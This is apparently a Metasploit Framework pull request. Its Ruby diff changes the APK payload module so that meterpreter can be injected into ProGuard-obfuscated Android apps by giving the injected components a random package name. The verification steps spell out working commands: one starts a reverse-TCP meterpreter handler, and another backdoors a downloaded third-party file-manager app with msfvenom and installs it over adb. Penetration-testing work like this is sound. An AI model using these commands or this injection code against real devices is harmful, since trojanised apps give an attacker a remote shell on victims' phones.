### PR TITLE
Fixes #7552, fix apk injection into proguarded apks

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -68,7 +68,7 @@ class Msf::Payload::Apk
     }
   end
 
-  def fix_manifest(tempdir)
+  def fix_manifest(tempdir, package)
     #Load payload's manifest
     payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
     payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
@@ -98,8 +98,12 @@ class Msf::Payload::Apk
     end
 
     application = original_manifest.at_xpath('/manifest/application')
-    application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
-    application << payload_manifest.at_xpath('/manifest/application/service').to_xml
+    receiver = payload_manifest.at_xpath('/manifest/application/receiver')
+    service = payload_manifest.at_xpath('/manifest/application/service')
+    receiver.attributes["name"].value = package + receiver.attributes["name"].value
+    service.attributes["name"].value = package + service.attributes["name"].value
+    application << receiver.to_xml
+    application << service.to_xml
 
     File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
   end
@@ -207,6 +211,7 @@ class Msf::Payload::Apk
     FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
 
     package = amanifest.xpath("//manifest").first['package']
+    package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
     package_slash = package.gsub(/\./, "/")
     print_status "Adding payload as package #{package}\n"
     payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
@@ -232,7 +237,7 @@ class Msf::Payload::Apk
     injected_apk = "#{tempdir}/output.apk"
     aligned_apk = "#{tempdir}/aligned.apk"
     print_status "Poisoning the manifest with meterpreter permissions..\n"
-    fix_manifest(tempdir)
+    fix_manifest(tempdir, package)
 
     print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
     run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")


### PR DESCRIPTION
This change fixes https://github.com/rapid7/metasploit-framework/issues/7552
This fixes injection into apps that have been proguarded. By default we were re-using the package name of the app as the payload, which means we would likely overwrite the .a class.
The fix means we use our own randomly generated package, to avoid conflicts.

## Verification

List the steps needed to make sure this thing works

- [x] Download the apk from http://es-file-explorer.en.uptodown.com/android/download
- [x] Start a handler: `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport 4444; set ExitOnSession false; run -j"`
- [x] Backdoor the apk: `msfvenom -x es-file-explorer-4-1-4-3.apk -p android/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -o met.apk && adb reverse tcp:4444 tcp:4444 && adb install met.apk` (this uses adb reverse to forward the connection over adb)
- [x] Open the app 
- [x] **Verify** the app behaves as before
- [x] **Verify** you get a session


